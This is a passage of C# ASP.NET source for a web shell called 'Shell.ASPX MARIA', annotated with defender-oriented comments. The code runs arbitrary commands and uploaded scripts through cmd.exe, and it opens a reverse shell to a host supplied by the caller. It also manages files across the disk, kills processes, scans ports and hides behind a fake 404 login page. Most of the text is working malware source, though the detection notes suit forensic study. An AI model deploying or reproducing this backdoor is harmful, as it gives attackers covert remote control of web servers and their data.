(dRead.Read()) {String Field = """"; int dbFields = dRead.FieldCount; for (int i = 1; i < dbFields; i++) {Field += ""<td>"" + dRead[i] + ""</td>""; } if (TypeOutput == ""Tables"") 
{SQLView += ""<tr><td><a href='?SQLProtocol=PostgreSQL&Action=SelectTable&host="" + LOCALHOST + ""&user="" + USERNAME + ""&pass="" + PASSWORD + ""&database="" + DATABASE + ""&Value="" + dRead[2] + ""' title='Table'>"" + dRead[2] + ""</td>"" + Field + ""</tr>""; } else {SQLView += ""<tr><td>"" + dRead[0] + ""</td>"" + Field + ""</tr>""; } Field = """"; } } else {SQLView += ""<div class='footTable'><b><h2>Output</h2></b>""; while (dRead.Read()) {SQLView += dRead.GetString(0); } SQLView += ""</code></div>""; } SQLView += ""</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action="" + MARIA + ""><input type=hidden name=PostgreSQL value=SQLite><input type=hidden name=host value="" + LOCALHOST + ""><input type=hidden name=database value="" + DATABASE + ""><input type=hidden name=user value="" + USERNAME + ""><input type=hidden name=pass value="" + PASSWORD + ""><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>"";Response.Write(SQLView); } catch (Exception e) {Response.Write(""<div class='alert'>"" + e.Message + ""</div>"");} finally{dRead.Close();dRead = null;conn.Close();conn = null;com.Dispose();com = null;}";
- String StyleHTML = @"<style type=""text/css""> * {font-family: Arial; font-size: 12px;} body {margin: 0px; background-color: white} pre {font-family: Courier New; background-color: black; margin: 60px;} .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;} .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;} .boxer {font-size: 15px; text-align: left;} .tabla {width: 100%; border: 3px solid #000;overflow-x:auto} .footTable {width: 100%; border: 3px solid #000;overflow-x:auto} .cmdPromp {background-color: black; color: white;border: 3px solid #000;} h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; } th {text-align: left; background-color: black; color: white} td {background-color: #d7d7d7;} a:link {background-color: #d7d7d7; color: black} a:visited {background-color: #d7d7d7;} a:hover {background-color: red;} a:active {background-color: #d7d7d7;} </style> ";
- using (System.IO.File.Create(@CurrentFolder + "TEMP~.aspx")) ;
- System.IO.File.WriteAllText(@CurrentFolder + "TEMP~.aspx", FileCreatePostgresSQLa + FileCreatePostgresSQLb + FileCreatePostgresSQLc + FileCreatePostgresSQLd + FileCreatePostgresSQLe + FileCreatePostgresSQLf + FileCreatePostgresSQLg + "%" + ">" + StyleHTML);
- SQLView = "<script>DivShowAndHidden('SQLConnection')</script><iframe width=100% height=100% scrolling=yes seamless=yes src=TEMP~.aspx?&host=" + LOCALHOST + "&user=" + USERNAME + "&pass=" + PASSWORD + "&database=" + DATABASE + "></iframe>";
- }
- catch (Exception e)
- {
- Response.Write("<div class='alert'>" + e.Message + "</div>");
- }
- }
- }
- // List Directories and Files: renders CurrentFolder as HTML rows with per-entry action links. NOTE(review): the query parameters used by these links (Directory, DeleteDir, View, get, Download) are web-log indicators; the code that handles them is not visible in this part of the listing.
- DirectoryInfo di = new DirectoryInfo(CurrentFolder);
- String lastdirectory = Path.GetFullPath(Path.Combine(CurrentFolder, @"..\")); // parent of the current folder
- Folders += string.Format("<tr><td><center><b>BACK DIRECTORY</b></center></a></td><td><a href='?Directory={0}'>..</a></td><td>Directory</td><td></td><td></td><td></td></tr>", lastdirectory); // the parent path is placed in the href without URL or HTML encoding
- foreach (DirectoryInfo curdir in di.GetDirectories())
- {
- string fstr = string.Format("<a href='?Directory={0}'>{1}</a>", HttpUtility.UrlEncode(CurrentFolder + "/" + curdir.Name), HttpUtility.HtmlEncode(curdir.Name)); // link that browses into the subdirectory
- Folders += string.Format("<tr><td><center><b><a href=?DeleteDir="+HttpUtility.UrlEncode(CurrentFolder+ "/" + curdir.Name)+">[X]</b></center></a></td><td>{0}</td><td>Directory</td><td></td><td></td><td></td></tr>", fstr); // [X] requests deletion of the directory through a plain GET link
- //attributesOfFolder="";
- }
- foreach (FileInfo curfile in di.GetFiles())
- {
- FileAttributes attributes = File.GetAttributes(@curfile.FullName);
- if ((attributes & FileAttributes.Hidden) == FileAttributes.Hidden) {attributesOfFiles+="<a title='Hidden'>H</a>";} // H marks hidden files
- if ((attributes & FileAttributes.ReadOnly) == FileAttributes.ReadOnly) {attributesOfFiles+="<a title='Read'>R</a>";}else{attributesOfFiles+="<a title='Read'>R</a><a title='Write'>W</a>";} // R for read-only files, RW otherwise
- string fstr = string.Format("<a href='?View={0}' target='_blank'>{1}</a>", HttpUtility.UrlEncode(CurrentFolder + "/" + curfile.Name), HttpUtility.HtmlEncode(curfile.Name)); // link that opens the file in a new tab
- string astr = string.Format("<b><i><center><a href='javascript:deletefile(\"{1}\")' title='Delete'>[X]</a> <a href='?Directory={0}&get={1}' title='Edict'>[E]</a> <a href='?Directory={0}&Download={1}' title='Download'>[D]</a> <a href='javascript:PopupBoxRenameFile(\"{0}\",\"{1}\");' title='Rename'>[R]</a></center></b></i>", HttpUtility.UrlEncode(CurrentFolder), HttpUtility.UrlEncode(CurrentFolder + "/" + curfile.Name)); // per-file delete, edit, download and rename actions; deletefile and PopupBoxRenameFile are client-side functions not defined in this part of the listing
- string Extension=HttpUtility.UrlEncode(curfile.Extension);
- Files += string.Format("<tr><td>{2}</td><td>{0}</td><td>{3} File</td><td>"+attributesOfFiles+"</td><td>"+curfile.CreationTime+"</td><td>{1:d} Kb</td></tr>", fstr, curfile.Length, astr, Extension); // curfile.Length is a byte count, although the cell is labelled Kb
- attributesOfFiles=""; // reset the attribute markers for the next file
- }
- // Console CMD: when the txtCmdIn text box is non-empty, its text is handed unmodified to "cmd.exe /c" and the captured stdout followed by stderr is placed in lblCmdOut.
- if (txtCmdIn.Text.Length > 0)
- {
- Process p = new Process();
- p.StartInfo.CreateNoWindow = true; // no console window is created for the child
- p.StartInfo.FileName = "cmd.exe"; // Defender note: the child is created by the web application's own process (w3wp.exe under IIS), a parent/child pair that process-creation telemetry can alert on.
- p.StartInfo.Arguments = "/c " + txtCmdIn.Text;
- p.StartInfo.UseShellExecute = false; // required for the stream redirection below
- p.StartInfo.RedirectStandardOutput = true;
- p.StartInfo.RedirectStandardError = true;
- p.StartInfo.WorkingDirectory = CurrentFolder; // runs in the folder currently being browsed
- p.Start();
- lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
- txtCmdIn.Text = ""; // clear the input box for the next request
- }
- // Searcher: on a POST with the "Searcher" field set, walks every file under CurrentFolder (all sub-directories) and reports matches by extension, exact file name, or a regular expression applied to each line of each file. Defender note: the content search opens every file under the folder, so file-access auditing on a web root would show a burst of reads from the web application's process.
- if(!string.IsNullOrEmpty(Request.Form["Searcher"])){
- string startFolder = @CurrentFolder;
- ResultSearchOuput+="<script>DivShowAndHidden('Searcher');</script>"; // makes the Searcher panel visible when the page loads
- System.IO.DirectoryInfo dir = new System.IO.DirectoryInfo(startFolder);
- try{
- if(!string.IsNullOrEmpty(Request.Form["QueryExtentionSearch"])){foreach (System.IO.FileInfo file in dir.GetFiles("*.*", System.IO.SearchOption.AllDirectories)){if(file.Extension == Request.Form["QueryExtentionSearch"]){ResultSearchOuput+="<br> Namefile : <b>"+file.FullName+"</b> Creation Time: <b><font color='green'>"+file.CreationTime+"</b></font>";}}} // match on extension (exact, case-sensitive string comparison)
- if(!string.IsNullOrEmpty(Request.Form["QueryNameSearch"])){foreach (System.IO.FileInfo file in dir.GetFiles("*.*", System.IO.SearchOption.AllDirectories)){if(file.Name == Request.Form["QueryNameSearch"]){ResultSearchOuput+="<br> Namefile : <b>"+file.FullName+"</b> Creation Time: <b><font color='green'>"+file.CreationTime+"</b></font>";}}} // match on exact file name
- if(!string.IsNullOrEmpty(Request.Form["QueryStringSearch"])){
- foreach (System.IO.FileInfo fi in dir.GetFiles("*.*", System.IO.SearchOption.AllDirectories)) {
- int counte=0; // 1-based line counter for the report
- string line; System.IO.StreamReader filetoRead = new System.IO.StreamReader(fi.FullName);
- String Patron=Request.Form["QueryStringSearch"]; // the pattern comes straight from the request
- Regex regex = new Regex(Patron, RegexOptions.IgnoreCase | RegexOptions.IgnorePatternWhitespace);
- while((line = filetoRead.ReadLine()) != null) {counte+=1;if (regex.Match(line).Success == true){ResultSearchOuput+="<br> Namefile : <b>"+fi.FullName+"</b> Creation Time: <b><font color='green'>"+fi.CreationTime+"</font> Line: "+counte+"</b>";}}filetoRead.Close();}}
- }catch(Exception e){Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");} // the first failure (e.g. an unreadable file) ends the whole search and is shown as an alert
- if (ResultSearchOuput.Length == 67){ResultSearchOuput="<script>DivShowAndHidden('Searcher');</script><div class='alert'>SHELL.ASPX Message: No Match </div>";} // 67 is the length of the initial "<h1>Result Found</h1>" header plus the script tag appended above, i.e. no result was added
- }
- // Host information shown in the page: machine name, OS version, processor count and the account the web application runs as.
- String NameMachine=Environment.MachineName.ToString();
- String VersionOS=Environment.OSVersion.ToString();
- String ProcessorCountMachine=Environment.ProcessorCount.ToString();
- String UserNameMachine=Environment.UserName.ToString();
- // Detect language runtimes by testing fixed install paths on the system drive (MainDrive is the root of the Windows system folder, set at the top of the page); only these five paths are checked.
- if (File.Exists(MainDrive+@"python27\python.exe")){Binaries+="<b><font color=green>Python 2.7</font></b> ";}
- if (File.Exists(MainDrive+@"python32\python.exe")){Binaries+="<b><font color=green>Python 3.2</font></b> ";}
- if (File.Exists(MainDrive+@"perl\bin\perl.exe")){Binaries+="<b><font color=blue>Perl</font></b> ";}
- if (File.Exists(MainDrive+@"ruby\ruby.exe")){Binaries+="<b><font color=red>Ruby</font></b> ";}
- if (File.Exists(MainDrive+@"ProgramData\Oracle\Java\javapath\java.exe")){Binaries+="<b><font color=coral>Java</font></b> ";}
- if (Binaries == ""){Binaries="No Binaries Detected...";} // placeholder text when none of the paths exist
- // Run Scripts: on a POST with a "language" field, writes the posted "content" to a file named scriptToRun.cmd or scriptToRun.vbs in CurrentFolder, runs it, captures the output, then deletes the file. Defender note: the on-disk artifact is short-lived, so look for file-creation events for "scriptToRun.*" and for cmd.exe or cscript started by the web application's process rather than for a file left behind.
- if(!string.IsNullOrEmpty(Request.Form["language"])){
- String ExtensionFile="";String BinLAN="";
- if(Request.Form["language"] == "batch"){ExtensionFile=".cmd";BinLAN="cmd.exe";}
- if(Request.Form["language"] == "vbs"){ExtensionFile=".vbs";BinLAN="cscript ";}
- using (System.IO.File.Create(@CurrentFolder+"scriptToRun"+ExtensionFile)); // creates the empty file; the handle is disposed at once
- System.IO.File.WriteAllText(@CurrentFolder+"scriptToRun"+ExtensionFile, Request.Form["content"]); // script body comes straight from the request
- Process p = new Process();
- p.StartInfo.CreateNoWindow = true;
- p.StartInfo.FileName = BinLAN;
- if(BinLAN=="cmd.exe"){p.StartInfo.Arguments = "/c "+@CurrentFolder+"scriptToRun"+ExtensionFile;}
- else{p.StartInfo.Arguments = @CurrentFolder+"scriptToRun"+ExtensionFile;}
- p.StartInfo.UseShellExecute = false; // required for the stream redirection below
- p.StartInfo.RedirectStandardOutput = true;
- p.StartInfo.RedirectStandardError = true;
- p.StartInfo.WorkingDirectory = CurrentFolder;
- p.Start();
- lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd(); // output is shown in the same literal as the console handler
- txtCmdIn.Text = "";
- File.Delete(@CurrentFolder+"scriptToRun"+ExtensionFile); // removes the script once the output has been read
- }
- // Process management: lists every process on the host into VTTable and, when the query string has both "action" and "process", kills each process whose name equals ?process=. Defender note: both parameters travel in the query string, so a kill request appears in web access logs as "process=<name>&action=..." against this page.
- System.Text.StringBuilder sb = new StringBuilder(); // not used in the visible code
- System.Diagnostics.Process[] processes = System.Diagnostics.Process.GetProcesses();
- String VTTable="";
- foreach (System.Diagnostics.Process process in processes)
- {
- if(Request.QueryString["action"] != null){ // only the presence of "action" is tested, not its value
- if(Request.QueryString["process"] == process.ProcessName){ // matches by name, so every process sharing that name is affected
- try{
- process.Kill();
- Response.Write("<div class='alert'>SHELL.ASPX Message: Process Killed</div>");
- }catch (Exception e){
- Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");
- }}}
- VTTable += string.Format("<tr><td><center><a href='?process={0}&action=kill' title='kill process'>[Kill]</a></td><td>{0}</td><td>{1}</td></tr>",process.ProcessName,process.WorkingSet64 / 1000); // one row per process: kill link, name, and WorkingSet64 divided by 1000
- //Response.Write(VTTable);
- }
- // Shell Reverse: on a POST with a non-empty "a" field, reads a host from "u" and a port from "p" and hands them to start.StartShell, which opens an outbound TCP connection (see the start class below). Defender note: the network signature is the web server's application process making an outbound connection to a host and port supplied in an inbound request; egress filtering and connection logging on web servers are the relevant controls.
- if (!string.IsNullOrEmpty(Request.Form["a"]))
- {
- try
- {
- start P = new start();
- String Hostname = Request.Form["u"];
- String PortListening = Request.Form["p"];
- Response.Write("<script>alert('SHELL.ASPX: Connecting with Host Remote ["+Hostname+":"+PortListening+"]')</script>"); // echoes the requested target into the page
- P.StartShell(Hostname, PortListening); // does not return until the connection loop in StartShell ends
- }
- catch (Exception e)
- {
- Response.Write("<div class='alert'>SHELL.ASPX Message: " + e.Message + "</div>");
- }
- }
- // General instructions: file-management handlers. Each one acts on a path read straight from the query string or form; the visible code applies no restriction to the web root. Defender note: the GET-driven handlers leave the parameter names Rename, file, Download, get, View, Delete, DeleteDir, NewFolder and NewFile in access-log query strings, which makes past activity reconstructable from logs.
- try{
- // Rename File: copies ?file= to CurrentFolder + ?Rename=, deletes the original, then redirects back to this page
- if (!string.IsNullOrEmpty(Request.QueryString["Rename"])){File.Copy(Request.QueryString["file"],@CurrentFolder+Request.QueryString["Rename"]);File.Delete(Request.QueryString["file"]);Response.Redirect (MARIA);}
- // Download File: sends the file named by ?Download= as an octet-stream attachment and ends the response
- if (!string.IsNullOrEmpty(Request.QueryString["Download"])){Response.Clear();Response.ContentType = "application/octet-stream";Response.AddHeader("Content-Disposition", "attachment; filename="+Request.QueryString["Download"]);Response.WriteFile(Request.QueryString["Download"]);Response.Flush();Response.End();}
- // Editor: writes the file named by ?get= into a textarea inside a save form, then ends the response
- if (!string.IsNullOrEmpty(Request.QueryString["get"])){Response.Write(" <title>Shell.ASPX MARIA - Editor</title><div style='font-size: 20px; background-color: red; color: #FFFFFF; text-align: left;'>Shell.APSX MARIA - Editor</h1><form method='POST' action='?Run'> <textarea name='content' style='height: 100%; width: 100%;'>");Response.WriteFile(Request.QueryString["get"]);Response.Write(" </textarea><input type='hidden' name='GetEdict' value='true'><input type='hidden' name='FileName' value='"+Request.QueryString["get"]+"'><input type='submit' value='Save'>");Response.End();}
- // File to edit: on a POST with GetEdict set, deletes FileName and recreates it with the posted "content"
- if(!string.IsNullOrEmpty(Request.Form["GetEdict"])){File.Delete(Request.Form["FileName"]);try{String FileToEdict = Request.Form["FileName"];FileToEdict = FileToEdict.Replace("//","\\").Replace("/","\\");using (System.IO.File.Create(@FileToEdict));System.IO.File.WriteAllText(@FileToEdict, Request.Form["content"]);Response.Write("<div class='alert'>SHELL.ASPX Message: File Edicted</div>");}catch (Exception e) {Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}}
- // Delete File: deletes the path in ?Delete=
- if (!string.IsNullOrEmpty(Request.QueryString["Delete"])){File.Delete(Request.QueryString["Delete"]);Response.Redirect (MARIA);}
- // View File: writes the file named by ?View= into a textarea and ends the response
- if (!string.IsNullOrEmpty(Request.QueryString["View"])){Response.Write("<title>Shell.ASPX MARIA - View</title><div style='font-size: 20px; background-color: red; color: #FFFFFF; text-align: left;'>Shell.APSX MARIA - View</h1> <textarea name='content' style='height: 100%; width: 100%;'>");Response.WriteFile(Request.QueryString["View"]);Response.Write(" </textarea>");Response.End();}
- // Delete Folder: deletes the directory in ?DeleteDir= using the non-recursive overload of Directory.Delete
- if (!string.IsNullOrEmpty(Request.QueryString["DeleteDir"])){System.IO.Directory.Delete(Request.QueryString["DeleteDir"]);Response.Redirect (MARIA);}
- // Make New Folder: creates CurrentFolder + ?NewFolder=
- if (!string.IsNullOrEmpty(Request.QueryString["NewFolder"])){System.IO.Directory.CreateDirectory(@CurrentFolder+Request.QueryString["NewFolder"]);Response.Redirect (MARIA);}
- // Make New File: creates an empty file at CurrentFolder + ?NewFile=
- if (!string.IsNullOrEmpty(Request.QueryString["NewFile"])){using (System.IO.File.Create(@CurrentFolder+Request.QueryString["NewFile"]));Response.Redirect (MARIA); }
- // Upload File: saves the file posted through the flUp control into CurrentFolder
- if(flUp.HasFile)
- {
- string fileName = flUp.FileName;
- int splitAt = flUp.FileName.LastIndexOfAny(new char[] { '/', '\\' });
- if (splitAt >= 0)
- fileName = flUp.FileName.Substring(splitAt); // keeps the text from the last path separator onward
- flUp.SaveAs(CurrentFolder + "/" + fileName);
- Response.Redirect (MARIA);
- }
- }catch(Exception e){Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");} // any failure in the handlers above is reported in the page as an alert div
- %>
- <script runat="server">
- public class start // Reverse-connecting command channel: connects out to a caller-supplied host and port, starts cmd.exe, and relays lines between the socket and the process. Defender note: the observable combination is an outbound TCP connection plus a long-lived cmd.exe child, both owned by the web application's process.
- {
- TcpClient tcpClient;
- NetworkStream networkStream;
- StreamWriter streamWriter;
- StreamReader streamReader;
- Process processCmd;
- StringBuilder strInput;
- public void StartShell(string IPR, string PORR) // IPR: remote host; PORR: remote port as text
- {
- tcpClient = new TcpClient();
- strInput = new StringBuilder();
- try
- {
- int PORT = Convert.ToInt32(PORR);
- tcpClient.Connect(IPR, PORT); // outbound connection from the server to the remote endpoint
- networkStream = tcpClient.GetStream();
- streamReader = new StreamReader(networkStream);
- streamWriter = new StreamWriter(networkStream);
- }
- catch (Exception err) { return; } // a bad port or failed connection is swallowed silently; nothing is reported to the page
- processCmd = new Process();
- processCmd.StartInfo.FileName = "cmd.exe";
- processCmd.StartInfo.CreateNoWindow = true;
- processCmd.StartInfo.UseShellExecute = false;
- processCmd.StartInfo.RedirectStandardOutput = true;
- processCmd.StartInfo.RedirectStandardInput = true;
- processCmd.StartInfo.RedirectStandardError = true;
- processCmd.OutputDataReceived += new
- DataReceivedEventHandler(CmdOutputDataHandler); // each stdout line of the child is forwarded to the socket by the handler below
- processCmd.Start();
- processCmd.BeginOutputReadLine();
- while (true) // relay loop: runs on the calling request thread until an exception ends it
- {
- try
- {
- strInput.Append(streamReader.ReadLine());
- strInput.Append("\n");
- if(strInput.ToString().LastIndexOf(
- "terminate") >= 0) StopServer(); // a line containing "terminate" exits the hosting process
- if(strInput.ToString().LastIndexOf(
- "exit") >= 0) throw new ArgumentException(); // a line containing "exit" is turned into an exception so the catch below cleans up
- processCmd.StandardInput.WriteLine(strInput);
- strInput.Remove(0, strInput.Length); // clear the buffer for the next line
- }
- catch (Exception err)
- {
- Cleanup();
- break;
- }
- }
- }
- private void Cleanup() // kills the child process and closes the reader, writer and network stream
- {
- try { processCmd.Kill(); } catch (Exception err) { };
- streamReader.Close();
- streamWriter.Close();
- networkStream.Close();
- }
- private void StopServer() // Defender note: Environment.Exit ends the process hosting this page, so an unexplained exit or restart of the web application's process can accompany use of this path.
- {
- Cleanup();
- System.Environment.Exit(System.Environment.ExitCode);
- }
- private void CmdOutputDataHandler(object sendingProcess,
- DataReceivedEventArgs outLine) // event handler: writes each non-empty stdout line of the child to the socket
- {
- StringBuilder strOutput = new StringBuilder();
- if(!String.IsNullOrEmpty(outLine.Data))
- {
- try
- {
- strOutput.Append(outLine.Data);
- streamWriter.WriteLine(strOutput);
- streamWriter.Flush();
- }
- catch (Exception err) { } // write failures (e.g. a closed socket) are ignored
- }
- }
- }// end class start
- </script>
- <!-- Shell MARIA / GUI -->
- <%
- // Login gate for the GUI: access is granted when a "UserSettings" cookie equals "Error=" + the hard-coded password, or when a POST field named "error" equals that password (which then sets the cookie). Otherwise the page writes a decoy "404 - File or directory not found" body that contains a borderless password input. Defender note: the visible code writes that decoy with Response.Write and sets no status code, so presumably the response is HTTP 200 with a 404-looking body; that mismatch, and a cookie named UserSettings whose value starts with "Error=", are both huntable. NOTE(review): this gate sits after the request handlers in the preceding code block, and none of the visible handlers reads REQCOOKIE, so during incident response do not assume that only password holders could trigger file or process actions; confirm against the full file.
- String REQCOOKIE = "NOACCESS"; // default: locked
- if (Request.Cookies["UserSettings"] != null)
- {
- HttpCookie COOK = Request.Cookies.Get("UserSettings");
- if (COOK.Value == "Error="+PASSWORG_SHELL) // the cookie carries the password itself in clear text
- {
- REQCOOKIE = "GRANTED";
- }
- }
- else
- {
- if (Request.Form["error"] == PASSWORG_SHELL) // first login: password posted from the input hidden in the decoy page
- {
- HttpCookie myCookie = new HttpCookie("UserSettings");
- myCookie["Error"] = PASSWORG_SHELL;
- myCookie.Expires = DateTime.Now.AddDays(1d); // cookie is valid for one day
- Response.Cookies.Add(myCookie);
- REQCOOKIE = "GRANTED";
- }
- }
- if (REQCOOKIE == "NOACCESS")
- {
- String SERVERERROR = @"
- <html>
- <head>
- <meta http-equiv=Content-Type content='text/html; charset=iso-8859-1'/>
- <title>404 - File or directory not found.</title>
- <style type=text/css>
- <!--
- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
- fieldset{padding:0 15px 10px 15px;}
- h1{font-size:2.4em;margin:0;color:#FFF;}
- h2{font-size:1.7em;margin:0;color:#CC0000;}
- h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
- #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:'trebuchet MS', Verdana, sans-serif;color:#FFF;
- background-color:#555555;}
- #content{margin:0 0 0 2%;position:relative;}
- .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
- -->
- </style>
- </head>
- <body>
- <div id=header><h1>Server Error</h1></div>
- <div id=content>
- <div class=content-container><fieldset>
- <h2>404 - File or directory not found.<form method=post><input style='border: 0px;cursor: default;padding: inherit;' type=password name=error></form></h2>
- <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
- </fieldset></div>
- </div>
- </body>
- </html>";
- Response.Write(SERVERERROR);
- }else{
- %>
- <html>
- <head>
- <title>SHELL</title>
- </head>
- <body>
- <style type="text/css">
- * {font-family: Arial; font-size: 12px;}
- body {margin: 0px; background-color: white}
- pre {font-family: Courier New; background-color: black; margin: 60px;}
- .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;}
- .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;}
- .boxer {font-size: 15px; text-align: left;}
- .tabla {width: 100%; border: 3px solid #000;overflow-x:auto}
- .footTable {width: 100%; border: 3px solid #000;overflow-x:auto}
- .cmdPromp {background-color: black; color: white;border: 3px solid #000;}
- h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; }
- th {text-align: left; background-color: black; color: white}
- td {background-color: #d7d7d7;}
- a:link {background-color: #d7d7d7; color: black}
- a:visited {background-color: #d7d7d7;}
- a:hover {background-color: red;}
- a:active {background-color: #d7d7d7;}
- #footer {width: 100%;height:81px;position:relative;bottom: 0;left: 0;}
- </style>
- <script language="JavaScript" type="text/javascript">
- <!--
- var ShellPROMPT = " SHELL.ASPX Message: \n";
- function Zanizar(value) { value = value.replace(/\/\//g, "\\"); value = value.replace(/\//g, "\\"); return value }
- function PopupBoxRenameFile(folder, file) { var string = prompt(ShellPROMPT + "Type the New Name for " + file + " file."); if (string != null) { folder = Zanizar(folder); file = Zanizar(file); window.location = "?file=" + file + "&Rename=" + string; } }
- function makeFolder() { var string = prompt(ShellPROMPT + "Type the New folder Name."); if (string != null) { alert(string); window.location = "?NewFolder=" + string; } }
- function makeFile() { var string = prompt(ShellPROMPT + "Type the New File Name."); if (string != null) { alert(string); window.location = "?NewFile=" + string; } }
- function DivShowAndHidden(DivName) { var e = document.getElementById(DivName); e.style.display = (e.style.display == 'block') ? 'none' : 'block'; }
- function GetFileDB(a) { var x = (a.value || a.options[a.selectedIndex].value); if (x == "SQLite") { DivShowAndHidden('FileNAMESQLite'); } }
- function GoFolder(folder){window.location = "?Directory="+folder; }
- function deletefile(file){if (confirm("Delete file : "+file+" ?") == true) {window.location = "?Delete="+file; } else {alert("Coward"); } }
- function Reloj() {
- if (!document.layers && !document.all && !document.getElementById)
- return
- var Digital = new Date()
- var hours = Digital.getHours()
- var minutes = Digital.getMinutes()
- var seconds = Digital.getSeconds()
- var d = new Date();
- var dn = "PM"
- if (hours < 12) { dn = "AM" } if (hours > 12) { hours = hours - 12 } if (hours == 0) { hours = 12 } if (minutes <= 9) { minutes = "0" + minutes } if (seconds <= 9) { seconds = "0" + seconds }
- myclock = hours + ":" + minutes + ":" + seconds + " " + dn + " % " + d.getDate() + "/" + (d.getMonth() + 1) + "/" + d.getFullYear() + " ID:<%= NameMachine +"<br> OS:"+ VersionOS %>"
- if (document.layers) { document.layers.liveclock.document.write(myclock); document.layers.liveclock.document.close() }
- else if (document.all) { liveclock.innerHTML = myclock }
- else if (document.getElementById) { document.getElementById("liveclock").innerHTML = myclock; setTimeout("Reloj()", 1000) }
- }
- window.onload = Reloj
- //-->
- </script>
- <div class="timer">Shell.ASPX MARIA<span style="position:absolute;left:80%;" id="liveclock"></div>
- <table class="tabla">
- <tr>
- <th scope="col">Commands</th>
- <th scope="col">Name</th>
- <th scope="col">Type</th>
- <th scope="col">Attributes</th>
- <th scope="col">Data Creation</th>
- <th scope="col">Size</th>
- </tr>
- <div class="footTable"><div class="boxer"> <a href="<%= MARIA %>"><input type="button" id="Dirs" value="Home"></a> Storages <%= Output %> Directory Current: <input type="text" id="CurrentFolder" style="width: 68%;" value="<%= CurrentFolder %>"> <input type="button" value="Go" onclick="GoFolder(document.getElementById('CurrentFolder').value)"> <input type="button" value="Make Folder" onclick="makeFolder()"><input type="button" onclick=" makeFile()" value="Make File"></div></div>
- <div class="Liste"> <%= Folders %> <%= Files %>
- <form id="form1" runat="server">
- <div class="footTable"> <b> Console</b> <asp:TextBox runat="server" ID="txtCmdIn" Width="88%" /><asp:Button runat="server" ID="cmdExec" Text="Execute" /></div><div class="cmdPromp">
- <pre>
- <h1>CMD::CONSOLE</h1>
- <asp:Literal runat="server" ID="lblCmdOut" Mode="Encode" /></pre></div>
- </table><div class="footTable">Upload Files :
- <asp:FileUpload runat="server" ID="flUp" />
- <asp:Button runat="server" ID="cmdUpload" Text="Upload" /></div>
- </form>
- <div class="footTable">Binaries detected: <%= Binaries %> </div>
- <div class="footTable"><center> <center style="background-color: black; color: white; font-family: inherit; font-language-override: inherit; font-style: italic;"> <input type="button" onclick="javascript: DivShowAndHidden('CONSOLE')" value="Scripting"> % <input type="button" onclick=" javascript: DivShowAndHidden('SQLConnection')" value="SQL Client"> % <input type="button" onclick=" javascript: DivShowAndHidden('Tasklist')" value="Process"> % <input type="button" onclick=" javascript: DivShowAndHidden('Searcher')" value="Searcher"> % <input type="button" onclick=" javascript: DivShowAndHidden('FTP')" value="FTP Client"> % <input type="button" onclick="javascript: DivShowAndHidden('SRV')" value="Shell-Reverse"/> % <input type="button" onclick="javascript: DivShowAndHidden('PSCAN')" value="Ping-Scan" /> % <input type="button" onclick="javascript: DivShowAndHidden('PORTSCAN')" value="Port-Scan" /></</b></center>
- <div id="CONSOLE" style="display:none;"><br> Script Type:
- <form method="POST">
- <select name="language">
- <option value="batch">Batch</option>
- <option value="vbs">VBS</option>
- </select><input type="submit" value="Run."> <br>
- <textarea name="content" style='height: 100%; width: 100%;'>
- </textarea>
- </form>
- </div></div>
- <div id="Tasklist" style="display:none;">
- <table class="tabla">
- <tr>
- <th scope="col">Commands</th>
- <th scope="col">Name</th>
- <th scope="col">PID</th>
- </tr>
- <%= VTTable %>
- </table>
- </div>
- <div id="PSCAN" style="display:none;">
- <div class="footTable">
- <form id="PSCANForm" method="POST"><br>
- <center>
- Range.......... <input type="text" name="Range" value="127.0.0.%">
- Timeout........ <input type="text" name="Timeout" value="3000">(s)<br>
- <input type="submit" value="Scan"><br>
- <%= PINGSCAN %>
- </form></center>
- </div></div>
- <div id="PORTSCAN" style="display:none;">
- <div class="footTable">
- <form id="PORTSCANForm" method="POST"><br>
- <center>
- IP.......... <input type="text" name="IPSCAN" value="<%= Request.Form["IPSCAN"] %>">
- Ports....... <input type="text" name="Ports" value="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500,22,443,8080,8081,8082,8083,8443,1099,9090,9091,9092,9093,9094,9443,7001">(s)<br>
- <input type="submit" value="Scan"><br>
- <%= PORTSCAN %>
- </form></center>
- </div></div>
- <div id="Searcher" style="display:none;">
- <div class="footTable"><br><center>
- <form id="Form2" method="POST">
- <input type="hidden" name="Searcher" value="true">
- Name.......... <input type="text" name="QueryNameSearch" value=""><br>
- Extension... <input type="text" name="QueryExtentionSearch" value=""><br>
- Content....... <input type="text" name="QueryStringSearch" value=""><br>
- <br><input type="submit" value="I'm gonna get lucky?..."><br>
- <%= ResultSearchOuput %>
- </p></form>
- </center><br>
- </div></div>
- <div id="SQLConnection" style="display:none;">
- <div class="footTable"><br><center>
- <form id="SQLForm" method="POST">SQL Type:
- <select onchange="GetFileDB(this)" name="SQLProtocol">
- <option value="SQLServer">SQLServer</option>
- <option value="SQLite">SQLite</option>
- <option value="PostgreSQL">PostgreSQL</option>
- <option value="MySQL">Mysql</option>
- </select>
- Host:<input type="text" name="host" value="<%= Request.Form["host"] + Request.QueryString["host"]%>">
- Port:<input type="text" name="port" value="<%= Request.Form["port"] + Request.QueryString["port"]%>">
- Username:<input type="text" name="user" value="<%= Request.Form["user"] + Request.QueryString["user"]%>">
